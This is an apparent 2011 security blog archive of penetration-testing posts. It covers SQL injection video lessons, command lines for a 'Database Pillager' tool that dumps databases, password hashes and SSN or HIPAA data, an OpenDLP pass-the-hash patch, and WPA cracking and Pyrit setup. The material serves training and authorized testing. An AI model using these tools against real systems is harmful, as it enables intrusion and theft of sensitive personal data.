Friday, November 11, 2011

Web Hacking Video Series #4 MySQL Part 2 (Injection and Coding)

Video Lesson Topics:

  1. Setting up your victim application, databases and lab
  2. Attacking a simple injection with information Schema
  3. Automating your injections with python and beautiful soup
  4. Dealing with various web encoding in Python and PHP
  5. Bypassing LoadFile Size restrictions and automating it
  6. Decrypting sensitive data via PHP and Python interactions
  7. As always me rambling about stupid nonsense :P FTW

Part 2 of Mysql covers the topic of injecting a simple SQL injection example. Starts out slow then combines techniques and moves into more advanced topics. Prior to attempting this lesson make sure you have watched the videos in the previous blog or understand both SQL and basic python coding. I will show how to automate the injection process via python utilizing simple HTML processing abilities of beautiful soup.  I will cover many python libraries for encoding data and calling web based applications. I also talk about how to deal with encrypted data and methods of enumerating files and folders looking for possible implementation issues and attack points to decrypt sensitive data via PHP/Python interaction with whats available on the server. This is the 2nd part of a 3 part series on MySQL for attacking web applications.

Files Needed:
Lab Files

Video Lesson:

Whats Next:
PHP source code analysis
Recoding PHP applications to fix SQLi

Friday, November 4, 2011

Web Hacking Video Series #3 MySQL Part 1 (SQL Primer)

Video Lesson Topics:
  1. Creating a SQL-cmdShell in python
  2. Setting up a SQL lab/learning environment
  3. Learning basic SQL queries
  4. More advanced queries for pulling meaningful data
  5. Interacting with the operating system
  6. Basic filter bypass and built in encoding mechanisms
  7. MySQL specific functions and structure
This part of the series is a manual sql/python tutorial which will instruct the viewer on how to create their own database interaction with python, the audience being both hackers and new developers.  After connecting to the database learn how to use that interaction for pulling meaningful data from a SQL database and interacting with the underlying operating systems and DB functionality. I will cover basic to more advanced sql queries and interactions. None of the videos contain any injection whatsoever,  instead a DB and SQL primer for the purpose of learning a foundation prior to trying to attack the unknown.  I do delve into many topics related to injection and relate many topics to injection but everything is done on the command line in an interactive lab environment you create for yourself!!  The next blog in the series will cover Injection followed by code analysis and recoding applications with parametrized queries. There will also be MSSQL based stuff in the same sequence of events in future posts.

Needed To follow Along:
  • BT5 VM
  • Test Database
  • The Pillager: 
Whats next:
MySql Injection
MSSQL specific learning and Labs
Source Code analysis
Recoding your applications in PHP and ASP

Part 1.1 Coding your Python SQL cmdShell:

Part 1.2 Learning SQL:

Saturday, September 3, 2011

DataBase Pillager 0.5 Release (Video) Targeted data searches

Updated Link + Features 9/27/2011 after this initial post (New Query-Cmd Line "-q" to drop you into a sql shell and data formatting on display)  
Example: python -a -d mysql -u root -p toor -q
Release 0.6: LINK:Download Pillager 0.6

Been busy as hell lately but I am working on a lot of stuff regarding SQL and Web Hacking stuff I will release soon, but right now I am releasing the newest version of the database pillager. There are numerous new features, optimizations and future development started and some really cool stuff. Currently the newest features include:

New Features:
Database/Table Name targeted searches (done)
Targeted Data searches within columns (done)
Reporting Options (Partially done)
GUI (In development)
Universal SQL CMD shell (Done mysql,mssql)
Also fixing a few more bugs related to mssql and unicode

Video Contents:
The below video will show how to make the most of the tool and show the newest targeted data searches as well as some program structure so you can make some simple modifications.

Untitled from ficti0n on Vimeo.

Commands used:

Simple Pillage:
python -a -d mysql -u root -p toor

Grab Hashes:
python -a -d mysql -u root -p toor --hashes

Database/Table Search based on a list:
python -a -d mysql -u root -p toor -n

Targeted Data Search bases on keyword list:
python -a -d mysql -u root -p toor  -D

Hipaa Search Specifically:
python -a -d mysql -u root -p toor -s hipaa

Limiting data:
python -a -d mysql -u root -p toor  -s hipaa -l 1

Location of Lists:
inputFiles directory

Thursday, June 9, 2011

Burp Intruder Time fields

This is an update from the last video blog: 

I had a update submission from Toxic after watching Web Application video #2. Although module 4 was to learn how to code custom situations... Toxic noted that there are time fields within burp intruder by adding the columns:

-Response Received
-Response Completed

You can get a number related to the seconds it took for the request to complete... For example the php code originally was set for a 2 second sleep function and so Jsmith had the following output:

Response Received: 2107

Now I upped the sleep function to 4 seconds and Jsmith has a new value of:

Response Received: 4001

I then upped the sleep function to 8 seconds and Jsmith has the new value of:
Response Received: 8002

Indicating that field actually does keep track of the time between request and response... Just another option for anyone playing with time based stuff in burp.....


Wednesday, June 8, 2011

Web Hacking Video Series #2 Analysis of application behavior to bypass common implementation issues

Video Lesson Topics:  (Running time 50+ minutes)
This lesson covers the following topics:
  1. Analysis of application behavior to bypass common implementation issues
  2. Writing custom python code to deal with more complex testing situations
  3. More on burp suite intruder, comparer and scoping settings
  4. Introducing firebug for inspecting page elements
  5. Lots of me rambling about testing issues and real world considerations/client issues

New Hacking Lab:  (USE FIREFOX)
 This is my second video on application security which includes a lab of 6 different user enumeration situations. Not really to show user enumeration, but to show the various ways developers handle situations and how we can determine ways to bypass issues. Everyone can follow along and play on the website as I ramble..  I got bored Friday night and started coding, and ended up with the beginning of a mini web hacking lab that I may continue to grow out regarding certain lessons or  I may allow downloading of the whole site when dealing with more dangerous topics I dont want to deploy online.  Also note that I dont care about complying with microsoft internet explorers finicky page parsing issues so use firefox if you dont want viewing issues.  ;)

Saturday, May 7, 2011

Web Hacking Video Series #1 Automating SQLi with Burp Extractor

After speaking with many penetration testers I have realized that web application hacking is a mystery for many testers who typically perform network based penetration testing but have no prior development knowledge. This post is the first in a series of Web Hacking Video Training posts that will attempt to show various techniques that prove useful in situations where you realize all avenues of attack are running across http based protocols. This is typical on external tests.

Sunday, April 24, 2011

Immunity Canvas Code and CMDLine Walkthrough

This weekend was my first time playing around with Immunity Canvas. I noticed a lack of documentation for anything Non-Gui based regarding the framework. Since i had such a hard time tracking down information I decided to make a video showing Canvas basic CMDLine usage and tried to explain some module code based on my initial analysis I hope it helps

Wednesday, April 6, 2011

DbPillage Release 0.3

Database Pillager Release 0.3 
(Couple New features and updates)

Quick announcement on the Database Pillager tool. I have added in new features and updated many things...  Below is some info and an example.

Updated Download Link: (0.6)

-Grabs database password hashes from each database type when -# or --hashes is used

-Implemented Hipaa Searches for all kinds of data (just searched the web for regexes :) haha if you have more I will be happy to add them)

    * SSN
      SSN with Dashes                 
      SSN with spaces
      Carefirst ID
      dental Procedure

Monday, March 28, 2011

The Database Pillager (tool release)

The Database Pillager
(Usage Tutorial, Tool Release 0.1)

I coded up a Database Pillaging tool for multiple database types which can be downloaded below I would host this tool on some kind of code hosting site but they all seem to be a pain in my ass so it will stay in zip format until I find one that isn't a pain to use or doesn't just display all of my personal data.

UPDATED DOWNLOAD LINK v0.6:  Also updated post for new syntax added new features since htis post but updated the syntax on this post )

Since I have yet to find a post exploitation database tool that works well for me, I coded my own. This project was created to solve a reoccurring problem I have had searching and retrieving PCI/HIPPA data after I have compromised the domain or obtained local database credentials and I still need to prove that I have access to sensitive data.  I have found this tool useful for many reasons including finding session tokens, passwords and creditcards in databases. The Database Pillager (DBPillage) was created to fulfill the following goals and is still in active development by myself and other contributors. 

Friday, February 4, 2011

OpenDLP Pass-The-Hash

OpenDLP is a great time saving tool when looking for sensitive data on windows machines but one pain with using it is that it requires a username and password for the target machine. Passwords are not always a luxury provided when conducting a pentest, but password hashes are usually plentiful in a windows environment and time crack passwords is not always feasible. The details of obtaining windows password hashes is out of scope for this guide and it will be assumed the reader is familiar with "passing the hash". This guide also assumes that you have already patched your systems samba install to allow for "passing the hash" and have also patched "winexe" - further information about this can be found at the following page:

With that out of the way.....

The OpenDLP database will need to be modified in order to hold our hash. If you already have OpenDLP installed or you are creating a new install you will need to run the following command after the database has been setup -

alter table profiles add column hash varchar(65);
Patching OpenDLP -

The provided patch is targeted for OpenDLP 0.2.5 - I cannot promise that it will work against any other version -

OpenDLP -

PTH-Patch - pth_mod.patch

If you are patching a new install move "pth_mod.patch" into the OpenDLP directory (OpenDLP-0.2.5) and apply -

tar -xjf OpenDLP-0.2.5.tar.bz2
mv pth_mod.patch OpenDLP-0.2.5
cd OpenDLP-0.2.5
patch -p1 -i pth_mod.patch
patching file OpenDLP/web/bin/control.html
patching file OpenDLP/web/bin/download_file.html
patching file OpenDLP/web/bin/profiles.html
patching file OpenDLP/web/bin/profiles-new.html
patching file OpenDLP/web/bin/results/results.html
patching file OpenDLP/web/bin/start-verify.html

If you are patching an existing install (OpenDLP-0.2.5) move the "pth_mod.patch" into the directory where OpenDLP is installed (default is - /var/www/localhost/OpenDLP/ ) and apply -

mv pth_mod.patch /var/www/localhost/OpenDLP/
patch -p2 -i pth_mod.patch
patching file web/bin/control.html
patching file web/bin/download_file.html
patching file web/bin/profiles.html
patching file web/bin/profiles-new.html
patching file web/bin/results/results.html
patching file web/bin/start-verify.html

Confirm that your OpenDLP install is still working by accessing the application.

Create a new profile, as you can see "SMBHash" is now an available option -

Enter in your information, as you can see in my example I have entered in a hash but no password -

Just to show here is the database entry for this profile -

Create a new scan using our new profile -

View the scan results, in the following screen shot I have clicked on the flagged file and opened it in gedit -

Tuesday, January 18, 2011

WPA JTR/Pyrit/cowpatty uses and cracking interoperability

Below is a bunch of  ways to inter-operate between pyrit/cowpatty/jtr with various attacking and exporting techniques. I recently figured these out while having to juggle all kinds of cracking issues. A few weeks ago I was performing a wireless pentest and came up across a rather standard WPA PSK network. However, this came with issues that spawned into learning a bunch of new command line usages for various tools in conjunction with one another. 

Wednesday, January 5, 2011

Setting up Pyrit on OSX with CUDA Support

A quick guide on getting pyrit installed and working on OSX with gpu (CUDA) support.

First you need to download and install CUDA drivers and CUDA SDK from nvidia.
Drivers -


Next you need to install Scapy
Scapy requires a couple libraries to be installed first - pylibpcap and libdnet.

Download and install libdnet and its python bindings
tar -xzf libdnet-1.12.tgz
cd libdnet-1.12
sudo make install
cd python
sudo python install

Download and install pylibpcap
tar -xzf pylibpcap-0.6.2.tar.gz
cd pylibpcap-0.6.2
sudo python install

Download and install scapy
tar -xzf scapy-latest.tar.gz
cd scapy-latest
sudo python install

Now that all the pre-reqs are installed we can now build and install Pyrit.

Download the latest pyrit from svn -
svn checkout pyrit-read-only

Build and install pyrit -
cd pyrit-read-only
cd pyrit
sudo python install

Build and install pyrit-cuda -
cd pyrit-read-only
cd cpyrit_cuda
sudo LDFLAGS=-L/usr/local/cuda/lib python install

Now that Pyrit is installed verify that cuda support is working -
pyrit list_cores
Pyrit 0.4.0-dev (svn r288) (C) 2008-2010 Lukas Lueg
This code is distributed under the GNU General Public License v3+

The following cores seem available...
#1: 'CUDA-Device #1 'GeForce GT 330M''
#2: 'CPU-Core (SSE2)'
#3: 'CPU-Core (SSE2)'
#4: 'CPU-Core (SSE2)'
#5: 'Network-Clients'